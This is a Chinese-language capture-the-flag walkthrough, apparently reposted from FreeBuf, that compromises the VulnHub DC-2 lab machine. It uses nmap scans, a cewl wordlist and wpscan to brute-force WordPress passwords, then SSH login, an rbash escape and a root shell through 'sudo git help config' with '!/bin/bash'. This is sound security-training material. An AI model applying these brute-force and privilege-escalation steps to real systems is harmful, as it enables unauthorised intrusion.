下载地址
https://www.vulnhub.com/entry/dc-2,311/
下载后解压,vm打开
由于自己ip是在192.168.6.3 如果虚拟机还是桥接则不好判断虚拟机的ip地址,所以调整为net模式
1.ip收集
信息收集第一步肯定是先找ip,由于知道自己虚拟机网段是192.168.23.xxx
所以利用nmap工具进行扫描
命令
nmap -sP 192.168.23.0/24
192.168.23.173
2.端口信息收集
nmap --script=vuln 192.168.23.173
开启的80端口,且cms貌似是wordpress 不排除误报
尝试访问
http://192.168.23.173:80
抓取网络数据包,发现做了重定向,跳转的目标是dc-2
3.修改本地host文件
在本地host文件中添加ip 写死指定目标为 dc-2
192.168.23.173 dc-2
可以看到确实是wordpress,而且存在一个flag
4.flag1
大概意思就是让我登录才能看到下一个flag
刚刚nmap扫出来的就有用了
有路径,有用户
尝试访问
http://192.168.23.173/wp-login.php
此时用到wspcan 可以爆破用户的密码
刚刚网页上有cewl 拿去百度,是一个可以将网站的密码生成一个字典
cewl http://dc-2 -w dict.txt 生成字典
cat dict.txt 查看是否生成字典
再利用wpscan
新建一个txt文档将三个用户写入
wpscan --url http://dc-2 -P dict.txt -U user.txt
| Username: jerry, Password: adipiscing
| Username: tom, Password: parturient
5.flag2
尝试登录 jerry登录成功找到了flag2
貌似意思是这条路找不到下去了,换条路吧
1flag3
没思路了,再用nmap扫一次全端口
nmap -A -p 1-65535 192.168.23.173
-A 全面扫描
-p 1-65535 全端口扫描
ssh 22端口改成了7744
尝试连接
ssh [email protected] -p 7744
连不上换个用户
ssh [email protected] -p 7744
在输入密码 parturient
连接成功
查看有啥内容 有个flag3
查看
cat flag3.txt
vim flag3.txt
vi flag3.txt
尝试几种打开方式,终于打开
三个重要的信息
tom jerry su
看到su 猜测和上一个一样需要提权什么的
flag4
发现刚刚都是有rbash
去网上查一下
切换到jerry用户
尝试返回上一级目录进入jerry目录
找到了flag4
4.1 flag5
不知道怎么办,看了看教程,flag4最后有一个git,百度git提权
sudo -l查看可以sudo的用户
这里采用方法一
sudo git help config
执行之后在最后一行输入
!/bin/bash
查询当前用户权限
whoami -----> root
cd /root
切换到root目录下查看root目录下的内容
cat final-flag.txt
5.总结
1.首先利用nmap全端口扫描一个一个的利用
2.先解决重定向问题,正常打开网站得到flag1
3.利用wpscan爆破密码
4.登录得到flag2,80端口利用完毕
5.7744ssh端口利用账号密码登录,得到flag3
6.通过flag3提权到另一个用户找到flag4
7.git提权到root找到final-flag.txt
本文作者:
, 转载请注明来自FreeBuf.COM